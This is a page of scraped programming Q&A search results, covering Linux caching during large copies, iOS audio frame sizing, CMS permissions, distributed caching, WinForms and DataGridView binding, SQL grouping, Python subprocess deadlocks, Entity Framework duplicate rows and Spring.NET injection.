Search Results

Search found 8687 results on 348 pages for 'per fagrell'.

Page 316/348 | < Previous Page | 312 313 314 315 316 317 318 319 320 321 322 323  | Next Page >

  • How can I limit the cache used by copying so there is still memory available for other cache?

    - by Peter
    Basic situation: I am copying some NTFS disks in openSuSE. Each one is 2 TB. When I do this, the system runs slowly. My guesses: I believe it is likely due to caching. Linux decides to discard useful cache (e.g. KDE4 bloat, virtual machine disks, LibreOffice binaries, Thunderbird binaries, etc.) and instead fills all available memory (24 GB total) with data from the disks being copied, which will be read only once, then written and never used again. So any time I then use these apps (or KDE4), the disk needs to be read again, and reading the bloat off the disk again makes things freeze/hiccup. Because the cache is gone and these bloated applications need lots of cache, this makes the system horribly slow. Since it is USB, the disk and disk controller are not the bottleneck, so using ionice does not make it faster. I believe it is the cache rather than just the motherboard going too slow, because if I stop all copying, it still runs choppily for a while until it re-caches everything, and if I restart the copying, it takes a minute before it is choppy again. But also, I can limit the copy to around 40 MB/s and it runs faster again (not because it has the right things cached, but because the motherboard buses have lots of extra bandwidth for the system disks). I can fully accept a performance loss from my motherboard's IO capability being completely consumed (which is 100% used, meaning 0% wasted, which makes me happy), but I can't accept that this caching mechanism performs so terribly in this specific use case. Output of free:
        # free
                     total       used       free     shared    buffers     cached
        Mem:      24731556   24531876     199680          0    8834056   12998916
        -/+ buffers/cache:    2698904   22032652
        Swap:      4194300      24764    4169536
    I also tried the same thing on Ubuntu, which causes a total system hang instead. ;) And to clarify, I am not asking how to leave memory free for the "system", but for "cache". I know that cache memory is automatically given back to the system when needed, but my problem is that it is not reserved for caching specific things. Question: is there some way to tell these copy operations to limit their memory usage so some important things remain cached, and therefore any slowdowns are a result of normal disk usage and not of rereading the same commonly used files? For example, is there a setting for the maximum memory per process/user/file system allowed to be used as cache/buffers?
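
    A sketch of one direction (not from the post): on Linux the copy process itself can tell the kernel not to keep its pages, via posix_fadvise(POSIX_FADV_DONTNEED), which is the approach tools like the nocache wrapper take. Below is a minimal Python 3 sketch of that idea; the chunk size and file paths are illustrative assumptions.

        import os

        CHUNK = 32 * 1024 * 1024  # 32 MB per round trip (illustrative)

        def copy_without_caching(src_path, dst_path):
            src = os.open(src_path, os.O_RDONLY)
            dst = os.open(dst_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o644)
            offset = 0
            try:
                while True:
                    chunk = os.read(src, CHUNK)
                    if not chunk:
                        break
                    os.write(dst, chunk)
                    os.fsync(dst)  # pages must be on disk before they can be dropped
                    # Ask the kernel to evict the just-used ranges from the page cache
                    # so the copy cannot push out application binaries or VM images.
                    os.posix_fadvise(src, offset, len(chunk), os.POSIX_FADV_DONTNEED)
                    os.posix_fadvise(dst, offset, len(chunk), os.POSIX_FADV_DONTNEED)
                    offset += len(chunk)
            finally:
                os.close(src)
                os.close(dst)

        if __name__ == "__main__":
            copy_without_caching("/mnt/src/disk.img", "/mnt/dst/disk.img")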

    Read the article

  • How to configure the framesize using AudioUnit.framework on iOS

    - by Piperoman
    I have an audio app i need to capture mic samples to encode into mp3 with ffmpeg First configure the audio: /** * We need to specifie our format on which we want to work. * We use Linear PCM cause its uncompressed and we work on raw data. * for more informations check. * * We want 16 bits, 2 bytes (short bytes) per packet/frames at 8khz */ AudioStreamBasicDescription audioFormat; audioFormat.mSampleRate = SAMPLE_RATE; audioFormat.mFormatID = kAudioFormatLinearPCM; audioFormat.mFormatFlags = kAudioFormatFlagIsPacked | kAudioFormatFlagIsSignedInteger; audioFormat.mFramesPerPacket = 1; audioFormat.mChannelsPerFrame = 1; audioFormat.mBitsPerChannel = audioFormat.mChannelsPerFrame*sizeof(SInt16)*8; audioFormat.mBytesPerPacket = audioFormat.mChannelsPerFrame*sizeof(SInt16); audioFormat.mBytesPerFrame = audioFormat.mChannelsPerFrame*sizeof(SInt16); The recording callback is: static OSStatus recordingCallback(void *inRefCon, AudioUnitRenderActionFlags *ioActionFlags, const AudioTimeStamp *inTimeStamp, UInt32 inBusNumber, UInt32 inNumberFrames, AudioBufferList *ioData) { NSLog(@"Log record: %lu", inBusNumber); NSLog(@"Log record: %lu", inNumberFrames); NSLog(@"Log record: %lu", (UInt32)inTimeStamp); // the data gets rendered here AudioBuffer buffer; // a variable where we check the status OSStatus status; /** This is the reference to the object who owns the callback. */ AudioProcessor *audioProcessor = (__bridge AudioProcessor*) inRefCon; /** on this point we define the number of channels, which is mono for the iphone. the number of frames is usally 512 or 1024. */ buffer.mDataByteSize = inNumberFrames * sizeof(SInt16); // sample size buffer.mNumberChannels = 1; // one channel buffer.mData = malloc( inNumberFrames * sizeof(SInt16) ); // buffer size // we put our buffer into a bufferlist array for rendering AudioBufferList bufferList; bufferList.mNumberBuffers = 1; bufferList.mBuffers[0] = buffer; // render input and check for error status = AudioUnitRender([audioProcessor audioUnit], ioActionFlags, inTimeStamp, inBusNumber, inNumberFrames, &bufferList); [audioProcessor hasError:status:__FILE__:__LINE__]; // process the bufferlist in the audio processor [audioProcessor processBuffer:&bufferList]; // clean up the buffer free(bufferList.mBuffers[0].mData); //NSLog(@"RECORD"); return noErr; } With data: inBusNumber = 1 inNumberFrames = 1024 inTimeStamp = 80444304 // All the time same inTimeStamp, this is strange However, the framesize that i need to encode mp3 is 1152. How can i configure it? If i do buffering, that implies a delay, but i would like to avoid this because is a real time app. If i use this configuration, each buffer i get trash trailing samples, 1152 - 1024 = 128 bad samples. All samples are SInt16.
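
    The MP3 encoder consumes fixed-size frames (1152 samples here), and the Audio Unit cannot be asked for that block size directly; the usual approach is a small FIFO that absorbs the 1024-sample callbacks and hands the encoder 1152-sample blocks, at the cost of at most one partial frame (under 1152 samples, roughly 144 ms at 8 kHz) of extra latency. A hedged C sketch follows; the FIFO capacity and the encode_mp3_frame callback are illustrative assumptions, not part of the original code.

        #include <stdint.h>
        #include <string.h>

        #define MP3_FRAME_SAMPLES 1152
        #define FIFO_CAPACITY     (MP3_FRAME_SAMPLES * 4)

        typedef struct {
            int16_t data[FIFO_CAPACITY];
            size_t  count;                 /* samples currently buffered */
        } SampleFifo;

        /* Call from the recording callback with each 1024-sample buffer. */
        static void fifo_push_and_encode(SampleFifo *fifo,
                                         const int16_t *samples, size_t n,
                                         void (*encode_mp3_frame)(const int16_t *, size_t))
        {
            if (fifo->count + n > FIFO_CAPACITY)
                return;                    /* overflow: real code should report this */
            memcpy(fifo->data + fifo->count, samples, n * sizeof(int16_t));
            fifo->count += n;

            /* Emit complete 1152-sample frames; the remainder waits for the next callback. */
            while (fifo->count >= MP3_FRAME_SAMPLES) {
                encode_mp3_frame(fifo->data, MP3_FRAME_SAMPLES);
                fifo->count -= MP3_FRAME_SAMPLES;
                memmove(fifo->data, fifo->data + MP3_FRAME_SAMPLES,
                        fifo->count * sizeof(int16_t));
            }
        }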

    Read the article

  • Good object/DB set-up for CMS-esque app for managing content and user permissions?

    - by sah302
    Hi all, so I am writing a big CMS-esque app to allow users to manage web content through web applications, I've got a pretty good db-driven user permission system going, but am having trouble coming up with a good way to handle content groups and pages, I've got a couple options and not sure which one to take. Furthermore, I am not sure how to handle static page updates that have no 'widgets' in them. My current set-up for permissions is this: Objects: User, UserGroup, UserUserGroup, UserGroupType Standard many to many relationship User -> UserUserGroup <- UserGroup each Usergroup has a UserGroupType, which could be anything from Title, Department, to PermissionGroup. PermissionGroup manages the permissions. Right now on a per page basis I check permissions based on their PermissionsGroups. So for a page which has CMS features for a news widget, I check for permission groups of "Site Admin" and "News Admin". Now the issue I am coming to is, the site has many different departments involved. No problem I think, I can just have a EntityContentGroup so any widget app can be used for any departments. So my HR department, each of their news items would be in the EntityContentGroup with the news item ID, and content group of "HR" or "HR News". But maybe this isn't the most efficient way to go about it? I don't want to put the content group simply as a NewsItemType because some news items could apply to multiple areas, so I want to be able to assign them to as many areas as I want. Likewise, all of my widget apps have this, so that's why I decided to choose EntityContentGroup and not just NewsItemContentGroup. I was also thinking well instead of doing a contentGroup do a Page object that says which page some entity should be on. It seems almost like the same thing, but would I want to use Page for something else? I was thinking Page would be used for static pages with no widgets, a simple Rich Text Editor can edit the content of that page and I save that item to a page?? And then instead of doing a page level check for UserGroup permissions, would it be better to associate a usergroup to a contentgroup, and then just depending on what contentGroup content on the page is displayed, determine the permissions through that relationship? Is that better? I am not sure at this point. I guess I am just getting a tad overwhelmed at this is the largest app in scope and size that I have ever written. What is the best approach for this based on my current user permission set-up?
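
    For the schema side, a hedged sketch of the EntityContentGroup idea described above is given below (T-SQL-flavoured; every name and type is illustrative). The point is that any widget entity can be tagged with any number of content groups, and permissions become a join from user groups to content groups rather than a per-page check.

        CREATE TABLE ContentGroup (
            ContentGroupId INT IDENTITY PRIMARY KEY,
            Name           NVARCHAR(100) NOT NULL
        );

        -- Any widget entity (news item, event, ...) may belong to many content groups.
        CREATE TABLE EntityContentGroup (
            EntityType     NVARCHAR(50) NOT NULL,   -- e.g. 'NewsItem'
            EntityId       INT          NOT NULL,
            ContentGroupId INT          NOT NULL REFERENCES ContentGroup(ContentGroupId),
            PRIMARY KEY (EntityType, EntityId, ContentGroupId)
        );

        -- Which user groups may manage which content groups.
        CREATE TABLE UserGroupContentGroup (
            UserGroupId    INT NOT NULL,
            ContentGroupId INT NOT NULL REFERENCES ContentGroup(ContentGroupId),
            PRIMARY KEY (UserGroupId, ContentGroupId)
        );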

    Read the article

  • Choosing a distributed shared memory solution

    - by mindas
    I have a task to build a prototype for a massively scalable distributed shared memory (DSM) app. The prototype would only serve as a proof-of-concept, but I want to spend my time most effectively by picking the components which would be used in the real solution later on. The aim of this solution is to take data input from an external source, churn it and make the result available for a number of frontends. Those "frontends" would just take the data from the cache and serve it without extra processing. The amount of frontend hits on this data can literally be millions per second. The data itself is very volatile; it can (and does) change quite rapidly. However the frontends should see "old" data until the newest has been processed and cached. The processing and writing is done by a single (redundant) node while other nodes only read the data. In other words: no read-through behaviour. I was looking into solutions like memcached however this particular one doesn't fulfil all our requirements which are listed below: The solution must at least have Java client API which is reasonably well maintained as the rest of app is written in Java and we are seasoned Java developers; The solution must be totally elastic: it should be possible to add new nodes without restarting other nodes in the cluster; The solution must be able to handle failover. Yes, I realize this means some overhead, but the overall served data size isn't big (1G max) so this shouldn't be a problem. By "failover" I mean seamless execution without hardcoding/changing server IP address(es) like in memcached clients when a node goes down; Ideally it should be possible to specify the degree of data overlapping (e.g. how many copies of the same data should be stored in the DSM cluster); There is no need to permanently store all the data but there might be a need of post-processing of some of the data (e.g. serialization to the DB). Price. Obviously we prefer free/open source but we're happy to pay a reasonable amount if a solution is worth it. In any way, paid 24hr/day support contract is a must. The whole thing has to be hosted in our data centers so SaaS offerings like Amazon SimpleDB are out of scope. We would only consider this if no other options would be available. Ideally the solution would be strictly consistent (as in CAP); however, eventual consistence can be considered as an option. Thanks in advance for any ideas.

    Read the article

  • Forcing a checkbox bound to a DataSource to update when it has not been viewed yet.

    - by Scott Chamberlain
    Here is a test framework to show what I am doing: create a new project add a tabbed control on tab 1 put a button on tab 2 put a check box paste this code for its code (use default names for controls) public partial class Form1 : Form { private List<bool> boolList = new List<bool>(); BindingSource bs = new BindingSource(); public Form1() { InitializeComponent(); boolList.Add(false); bs.DataSource = boolList; checkBox1.DataBindings.Add("Checked", bs, ""); this.button1.Click += new System.EventHandler(this.button1_Click); this.checkBox1.CheckedChanged += new System.EventHandler(this.checkBox1_CheckedChanged); } bool updating = false; private void button1_Click(object sender, EventArgs e) { updating = true; boolList[0] = true; bs.ResetBindings(false); Application.DoEvents(); updating = false; } private void checkBox1_CheckedChanged(object sender, EventArgs e) { if (!updating) MessageBox.Show("CheckChanged fired outside of updating"); } } The issue is if you run the program and look at tab 2 then press the button on tab 1 the program works as expected, however if you press the button on tab 1 then look at tab 2 the event for the checkbox will not fire untill you look at tab 2. The reason for this is the controll on tab 2 is not in the "created" state, so its binding to change the checkbox from unchecked to checked does not happen until after the control has been "Created". checkbox1.CreateControl() does not do anything because according to MSDN CreateControl does not create a control handle if the control's Visible property is false. You can either call the CreateHandle method or access the Handle property to create the control's handle regardless of the control's visibility, but in this case, no window handles are created for the control's children. I tried getting the value of Handle(there is no public CreateHandle() for CheckBox) but still the same result. Any suggestions other than have the program quickly flash all of my tabs that have data-bound check boxes when it first loads? EDIT-- per Jaxidian's suggestion I created a new class public class newcheckbox : CheckBox { public new void CreateHandle() { base.CreateHandle(); } } I call CreateHandle() right after updating = true same results as before.

    Read the article

  • How to measure a canvas that has auto height and width

    - by Wymmeroo
    Hi Folks, I'm a beginner in silverlight so i hope i can get an answer that brings me some more light in the measure process of silverlight. I found an interessting flap out control from silverlight slide control and now I try to use it in my project. So that the slide out is working proper, I have to place the user control on a canvas. The user control then uses for itself the height of its content. I just wanna change that behavior so that the height is set to the available space from the parent canvas. You see the uxBorder where the height is set. How can I measure the actual height and set it to the border? I tried it with Height={Binding ElementName=notificationCanvas, Path=ActualHeight} but this dependency property has no callback, so the actualHeight is never set. What I want to achieve is a usercontrol like the tweetboard per example on Jesse Liberty's blog Sorry for my English writing, I hope you understand my question. <Canvas x:Name="notificationCanvas" Background="Red"> <SlideEffectEx:SimpleSlideControl GripWidth="20" GripTitle="Task" GripHeight="100"> <Border x:Name="uxBorder" BorderThickness="2" CornerRadius="5" BorderBrush="DarkGray" Background="DarkGray" Padding="5" Width="300" Height="700" > <StackPanel> <TextBlock Text="Tasks"></TextBlock> <Button x:Name="btn1" Margin="5" Content="{Binding ElementName=MainBorder, Path=Height}"></Button> <Button x:Name="btn2" Margin="5" Content="Second Button"></Button> <Button x:Name="btn3" Margin="5" Content="Third Button"></Button> <Button x:Name="btn1_Copy" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy1" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy2" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy3" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy4" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy5" Margin="5" Content="First Button"/> <Button x:Name="btn1_Copy6" Margin="5" Content="First Button"/> </StackPanel> </Border> </SlideEffectEx:SimpleSlideControl>
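
    Since ActualHeight raises no change notification in Silverlight, one common workaround is to skip the binding and push the size from the canvas's SizeChanged event in code-behind. A hedged C# sketch, reusing the element names from the posted XAML (the wrapping class name is an assumption):

        using System.Windows.Controls;

        // Code-behind for the view that contains notificationCanvas and uxBorder.
        public partial class NotificationView : UserControl   // class name is illustrative
        {
            public NotificationView()
            {
                InitializeComponent();

                // Fires whenever layout gives the canvas a new size, including the
                // first arrange pass, so the border always tracks the available height.
                notificationCanvas.SizeChanged += (sender, e) =>
                {
                    uxBorder.Height = e.NewSize.Height;
                };
            }
        }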

    Read the article

  • Get values from a table as key/value pairs with jQuery

    - by liz
    I have a table: <table class="datatable" id="hosprates"> <caption> hospitalization rates test</caption> <thead> <tr> <th scope="col">Funding Source</th> <th scope="col">Alameda County</th> <th scope="col">California</th> </tr> </thead> <tbody> <tr> <th scope="row">Medi-Cal</th> <td>34.3</td> <td>32.3</td> </tr> <tr> <th scope="row">Private</th> <td>32.2</td> <td>34.2</td> </tr> <tr> <th scope="row">Other</th> <td>22.7</td> <td>21.7</td> </tr> </tbody> </table> i want to retrieve column 1 and column 2 values per row as pairs that end up looking like this [funding,number],[funding,number] i did this so far, but when i alert it, it only shows [object, object]... var myfunding = $('#hosprates tbody tr').each(function(){ var funding = new Object(); funding.name = $('#hosprates tbody tr td:nth-child(1)').map(function() { return $(this).text().match(/\S+/)[0]; }).get(); funding.value= $('#hosprates tbody tr td:nth-child(2)').map(function() { return $(this).text().match(/\S+/)[0]; }).get(); }); alert (myfunding);
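
    The posted .each() callback re-selects the whole table on every pass instead of scoping to the current row, and .each() returns the jQuery set itself, which is why the alert shows objects. A hedged jQuery sketch that builds one [name, value] pair per row:

        // Scope each lookup to the current row via $(this).
        var myfunding = $('#hosprates tbody tr').map(function () {
            var name  = $(this).find('th').text();                     // e.g. "Medi-Cal"
            var value = parseFloat($(this).find('td:eq(0)').text());   // Alameda County column
            return [[name, value]];   // double-wrap so .map() keeps each pair intact
        }).get();

        alert(JSON.stringify(myfunding));  // [["Medi-Cal",34.3],["Private",32.2],["Other",22.7]]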

    Read the article

  • How to keep multiple connectionString passwords safe, separate, and easy to deploy?

    - by Funka
    I know there are plenty of questions here already about this topic (I've read through as many as I could find), but I haven't yet been able to figure out how best to satisfy my particular criteria. Here are the goals: The ASP.NET application will run on a few different web servers, including localhost workstations for development. This means encrypting web.config using a machine key is out. The application will decide which connection string to use based on the server name (using a switch statement). For example, "localhost" and "dev.example.com" will use the DevDatabaseConnectionString, "test.example.com" will use the TestDatabaseConnectionString, and "www.example.com" will use the ProdDatabaseConnectionString, for example. Ideally, the exact same executables and web.config should be able to run on any of these environments, without needing to tailor or configure each environment separately every time that we deploy (something that seems like it would be easy to forget/mess up one day during a deployment, which is why we moved away from having just one connectionstring that has to be changed on each target). Deployment is currently accomplished via FTP. We will not have command-line access to the production web server. This means using aspnet_regiis.exe is out. (I could run on localhost, however, if this would still work.) We would prefer to not have to recompile the application whenever a password changes, so using web.config (or db.config or whatever) seems to make the most sense. A developer should not be able to decrypt the production database password. If a developer checks the source code out onto their localhost laptop (which would determine that it should be using the DevDatabaseConnectionString, remember?) and the laptop gets lost or stolen, it should not be possible to get at the other connection strings. Thus, having a single RSA private key to un-encrypt all three passwords cannot be considered. (Contrary to #3 above, it does seem like we'd need to have three separate key files if we went this route; these could be installed once per machine, and should the wrong key file get deployed to the wrong server, the worst that should happen is that the app can't decrypt anything---and not allow the wrong host to access the wrong database!) I know this is probably a subjective question (asking for a "best" way to do something), but given the criteria I've mentioned, I'm hoping that a single best answer will indeed arise. Thank you!

    Read the article

  • Criteria query returns hydrated object in SQLite but not SqlServer

    - by Berryl
    I have a method that returns a resource fully hydrated when the db is SQLite but when the identical code is used by SqlServer the object is not fully hydrated. I'll explain that with the code after some brief background. I my domain various otherwise unrelated things like an Employee or a Machine can be used as a Resource that can be allocated to. In the object model an example of this would be: /// <summary>Wraps a <see cref="StaffMember"/> in a <see cref="ResourceBase"/>. </summary> public class StaffMemberResource : ResourceBase { public virtual StaffMember StaffMember { get; private set; } public StaffMemberResource(StaffMember staffMember) { Check.RequireNotNull<StaffMember>(staffMember); base.BusinessId = staffMember.Number.ToString(); base.Name = staffMember.Name.ToString(); base.OrganizationName = staffMember.Department.Name; StaffMember = staffMember; } [UsedImplicitly] protected StaffMemberResource() { } } And in the db tables, there is a table per class inheritance where the ResourceBase has a discriminator and the id of the actual resource (ie, StaffMember) StaffMember - 1 ---- M- ResourceBase - 1 ----- M - Allocation The Code public override StaffMemberResource BuildResource(IActivityService activityService) { var sessionFactory = _GetSessionFactory(); var session = sessionFactory.GetCurrentSession(); StaffMemberResource result; using (var tx = session.BeginTransaction()) { var propertyName = ExprHelper.GetPropertyName<StaffMember>(x => x.Number); var staff = session.CreateCriteria<StaffMember>() .Add(Restrictions.Eq(propertyName, new EmployeeNumber(_testData.Resource_1.BusinessId))) .UniqueResult<StaffMember>(); if (staff == null) { ... build up a staff member result = new StaffMemberResource(staff); } else { ////////// var property = ExprHelper.GetPropertyName<StaffMemberResource>(x => x.StaffMember); result = session.CreateCriteria<StaffMemberResource>() .Add(Restrictions.Eq(property, staff)) .UniqueResult<StaffMemberResource>(); } /////////// tx.Commit(); } return result; } It's that second criteria query that works "properly" with SQLite but not with SqlServer. By properly I mean that the employee numer is translated into a ResourceBase.BusinessId, Name is flattened out into a ResourceBase.Name, etc. Does anyone know why this might be? Cheers, Berryl

    Read the article

  • Complex SQL query with group by and two rows in one

    - by Ricket
    Okay, I need help. I'm usually pretty good at SQL queries but this one baffles me. By the way, this is not a homework assignment, it's a real situation in an Access database and I've written the requirements below myself. Here is my table layout. It's in Access 2007 if that matters; I'm writing the query using SQL. Id (primary key) PersonID (foreign key) EventDate NumberOfCredits SuperCredits (boolean) There are events that people go to. They can earn normal credits, or super credits, or both at one event. The SuperCredits column is true if the row represents a number of super credits earned at the event, or false if it represents normal credits. So for example, if there is an event which person 174 attends, and they earn 3 normal credits and 1 super credit at the event, the following two rows would be added to the table: ID PersonID EventDate NumberOfCredits SuperCredits 1 174 1/1/2010 3 false 2 174 1/1/2010 1 true It is also possible that the person could have done two separate things at the event, so there might be more than two columns for one event, and it might look like this: ID PersonID EventDate NumberOfCredits SuperCredits 1 174 1/1/2010 1 false 2 174 1/1/2010 2 false 3 174 1/1/2010 1 true Now we want to print out a report. Here will be the columns of the report: PersonID LastEventDate NumberOfNormalCredits NumberOfSuperCredits The report will have one row per person. The row will show the latest event that the person attended, and the normal and super credits that the person earned at that event. What I am asking of you is to write, or help me write, the SQL query to SELECT the data and GROUP BY and SUM() and whatnot. Or, let me know if this is for some reason not possible, and how to organize my data to make it possible. This is extremely confusing and I understand if you do not take the time to puzzle through it. I've tried to simplify it as much as possible, but definitely ask any questions if you give it a shot and need clarification. I'll be trying to figure it out but I'm having a real hard time with it, this is grouping beyond my experience...
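
    This is doable in one query: a derived table picks each person's latest EventDate, and conditional sums split that event's rows into normal and super credits. A hedged Access SQL sketch; the table name CreditEvents is an assumption.

        SELECT c.PersonID,
               c.EventDate                                    AS LastEventDate,
               SUM(IIf(c.SuperCredits, 0, c.NumberOfCredits)) AS NumberOfNormalCredits,
               SUM(IIf(c.SuperCredits, c.NumberOfCredits, 0)) AS NumberOfSuperCredits
        FROM CreditEvents AS c
        INNER JOIN (
            SELECT PersonID, MAX(EventDate) AS LastDate
            FROM CreditEvents
            GROUP BY PersonID
        ) AS latest
            ON c.PersonID = latest.PersonID
           AND c.EventDate = latest.LastDate
        GROUP BY c.PersonID, c.EventDate;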

    Read the article

  • Python: Script works, but seems to deadlock after some time

    - by sberry2A
    I have the following script, which is working for the most part (link to PasteBin). The script's job is to start a number of threads, each of which in turn starts a subprocess with Popen. The output from each subprocess looks like: 1 2 3 . . . n Done. Basically the subprocess is transferring 10M records from tables in one database to different tables in another database, with a lot of data massaging/manipulation in between because of the different schemas. If the subprocess fails at any point in its execution (bad records, duplicate primary keys, etc.), or if it completes successfully, it will output "Done\n". If there are no more records to select for transfer, it will output "NO DATA\n". My intent was to create a script, "tableTransfer.py", which would spawn a number of these processes, read their output, and in turn output information such as the number of updates completed, time remaining, time elapsed, and number of transfers per second. I started running the process last night and checked in this morning to find it had deadlocked. There were no subprocesses running, there were still records to be updated, and the script had not exited. It was simply sitting there, no longer outputting the current information, because no subprocesses were running to update the total number completed, which is what controls updates to the output. This is running on OS X. I am looking for three things: (1) I would like to get rid of the possibility of this deadlock occurring so I don't need to check on it as frequently. Is there some issue with locking? Am I doing this in a bad way (a gThreading variable to control the loop that spawns additional threads, etc.)? (2) I would appreciate some suggestions for improving my overall methodology. (3) How should I handle a Ctrl-C exit? Right now I need to kill the process, but I assume I should be able to use the signal module or similar to catch the signal and stop the threads; is that right? I am not sure whether I should paste my entire script here, since I usually just paste snippets. Let me know if I should paste it here as well.
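
    Two things usually fix this pattern, sketched below in Python (the worker command line and the stop_event protocol are assumptions, since only a PasteBin link to the real script is given): read each child's output with communicate() so a filled pipe can never block it, and keep the main thread in an interruptible join loop so Ctrl-C can set a flag that stops the workers from spawning more subprocesses.

        import subprocess
        import threading

        stop_event = threading.Event()

        def run_transfers(worker_id):
            while not stop_event.is_set():
                proc = subprocess.Popen(
                    ["python", "transfer_worker.py", str(worker_id)],
                    stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                    universal_newlines=True)
                out, _ = proc.communicate()     # drains stdout fully; cannot block on a full pipe
                if "NO DATA" in out:
                    break                       # nothing left for this worker to transfer

        def main():
            workers = [threading.Thread(target=run_transfers, args=(i,)) for i in range(4)]
            for w in workers:
                w.start()
            try:
                while any(w.is_alive() for w in workers):
                    for w in workers:
                        w.join(timeout=0.5)     # short joins keep the main thread responsive to Ctrl-C
            except KeyboardInterrupt:
                stop_event.set()                # ask workers to stop after their current subprocess
                for w in workers:
                    w.join()

        if __name__ == "__main__":
            main()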

    Read the article

  • LINQ Query Returning Multiple Copies Of First Result

    - by Mike G
    I'm trying to figure out why a simple query in LINQ is returning odd results. I have a view defined in the database. It basically brings together several other tables and does some data munging. It really isn't anything special except for the fact that it deals with a large data set and can be a bit slow. I want to query this view based on a long. Two sample queries below show different queries to this view. var la = Runtime.OmsEntityContext.Positions.Where(p => p.AccountNumber == 12345678).ToList(); var deDa = Runtime.OmsEntityContext.Positions.Where(p => p.AccountNumber == 12345678).Select(p => new { p.AccountNumber, p.SecurityNumber, p.CUSIP }).ToList(); The first one should hand back a List. The second one will be a list of anonymous objects. When I do these queries in entities framework the first one will hand me back a list of results where they're all exactly the same. The second query will hand me back data where the account number is the one that I queried and the other values differ. This seems to do this on a per account number basis, ie if I were to query for one account number or another all the Position objects for one account would have the same value (the first one in the list of Positions for that account) and the second account would have a set of Position objects that all had the same value (again, the first one in it's list of Position objects). I can write SQL that is in effect the same as either of the two EF queries. They both come back with results (say four) that show the correct data, one account number with different securities numbers. Why does this happen??? Is there something that I could be doing wrong so that if I had four results for the first query above that the first record's data also appears in the 2-4th's objects??? I cannot fathom what would/could be causing this. I've searched Google for all kinds of keywords and haven't seen anyone with this issue. We partial class out the Positions class for added functionality (smart object) and some smart properties. There are even some constructors that provide some view model type support. None of this is invoked in the request (I'm 99% sure of this). However, we do this same pattern all over the app. The only thing I can think of is that the mapping in the EDMX is screwy. Is there a way that this would happen if the "primary keys" in the EDMX were not in fact unique given the way the view is constructed? I'm thinking that the dev who imported this model into the EDMX let the designer auto select what would be unique. Any help would give a haggered dev some hope!
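
    When every row in a group comes back as a copy of the first row, the usual culprit is identity resolution: the entity key EF inferred for the view (here apparently just the account number) is not actually unique, so all rows sharing that key are materialized as the same tracked entity. A quick way to confirm is to run the query without tracking (a hedged sketch below, assuming the EF4 ObjectContext API that an EDMX model implies); the lasting fix is to widen the entity key in the EDMX to a combination of columns that really is unique.

        // Hedged sketch: disable identity resolution for queries built from this set.
        var positions = Runtime.OmsEntityContext.Positions;          // ObjectSet<Position>
        positions.MergeOption = System.Data.Objects.MergeOption.NoTracking;

        var la = positions
            .Where(p => p.AccountNumber == 12345678)
            .ToList();   // with NoTracking, each row materializes with its own values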

    Read the article

  • Spring.NET & Immediacy CMS (or how to inject into server-side controls without using PageHandlerFactory)

    - by Simon Rice
    Is there any way to inject dependencies into an Immediacy CMS control using Spring.NET, ideally without having to use to ContextRegistry when initialising the control? Update, with my own answer The issue here is that Immediacy already has a handler defined in web.config that deals with all aspx pages, & so it's not possible add an entry for Spring.NET's PageHandlerFactory in web.config as per a normal webforms app. That rules out making the control implement ISupportsWebDependencyInjection. Furthermore, most of Immediacy's generated pages are aspx pages that don't physically exist on the drive. I have changed the title of the question to reflect this. What I have done to get Dependency Injection working is: Add the usual entries to web.config for Spring.NET as outlined in the documentation, except for the adding the entry to the <httpHandlers> section. In this case I've got my object definitions in Spring.config. Create the following abstract base class that will deal with all of the Dependency Injection work: DIControl.cs public abstract class DIControl : ImmediacyControl { protected virtual string DIName { get { return this.GetType().Name; } } protected override void OnInit(EventArgs e) { if (ContextRegistry.GetContext().GetObject(DIName, this.GetType()) != null) ContextRegistry.GetContext().ConfigureObject(this, DIName); base.OnInit(e); } } For non-immediacy controls, you can make this server side control inherit from Control or whatever subclass of that you like. For any control with which you wish to use with Spring.NET's Inversion of Control container, define it to inherit from DIControl & add the relelvant entry to Spring.config, for example: SampleControl.cs public class SampleControl : DIControl, INamingContainer { public string Text { get; set; } protected string InjectedText { get; set; } public SampleControl() : base() { Text = "Hello world"; } protected override void RenderContents(HtmlTextWriter output) { output.Write(string.Format("{0} {1}", Text, InjectedText)); } } Spring.config <objects xmlns="http://www.springframework.net"> <object id="SampleControl" type="MyProject.SampleControl, MyAssembly"> <property name="InjectedText" value="from Spring.NET" /> </object> </objects> You can optionally override DIName if you wish to name your entry in Spring.config differently from the name of your class. Provided everything's done correctly, you will have the control writing out "Hello world from Spring.NET!" when used in a page. This solution uses Spring.NET's ContextRegistry from within the control, but I would be surprised if there's no way around that for Immediacy at least since the page objects themselves aren't accessible. However, can this be improved at all from a Spring.NET perspective? Is there maybe an Immediacy plugin that already does this that I'm completely unaware of? Or is there an approach that does this in a more elegant way? I'm open to suggestions.

    Read the article

  • How to assign class property as display data member in datagridview

    - by KoolKabin
    hi guys, I am trying to display my data in datagridview. I created a class with different property and used its list as the datasource. it worked fine. but I got confused how to do that in case we have nested class. My Classes are as follows: class Category property UIN as integer property Name as string end class class item property uin as integer property name as string property mycategory as category end class my data list as follows: dim myDataList as list(of Item) = new List(of Item) myDataList.Add(new Item(1,"item1",new category(1,"cat1"))) myDataList.Add(new Item(2,"item2",new category(1,"cat1"))) myDataList.Add(new Item(3,"item3",new category(1,"cat1"))) myDataList.Add(new Item(4,"item4",new category(2,"cat2"))) myDataList.Add(new Item(5,"item5",new category(2,"cat2"))) myDataList.Add(new Item(6,"item6",new category(2,"cat2"))) Now I binded the datagridview control like: DGVMain.AutoGenerateColumns = False DGVMain.ColumnCount = 3 DGVMain.Columns(0).DataPropertyName = "UIN" DGVMain.Columns(0).HeaderText = "ID" DGVMain.Columns(1).DataPropertyName = "Name" DGVMain.Columns(1).HeaderText = "Name" DGVMain.Columns(2).DataPropertyName = "" **'here i want my category name** DGVMain.Columns(2).HeaderText = "category" DGVMain.datasource = myDataList DGVMain.refresh() I have tried using mycategory.name but it didn't worked. What can be done to get expected result? Is there any better idea other than this to accomplish the same task? Edited My question as per comment: I have checked the link given by u. It was nice n very usefull. Since the code was in c# i tried to convert it in vb. Everything went good but failed at a point of case sensitive and next one is that i had my nested class name itemcategory and my property name was category. there it arouse the problem. it didn't searched for category but it searched for itemcategory. so confused on it. My Code as follows: Private Sub DGVMain_CellFormatting(ByVal sender As Object, ByVal e As 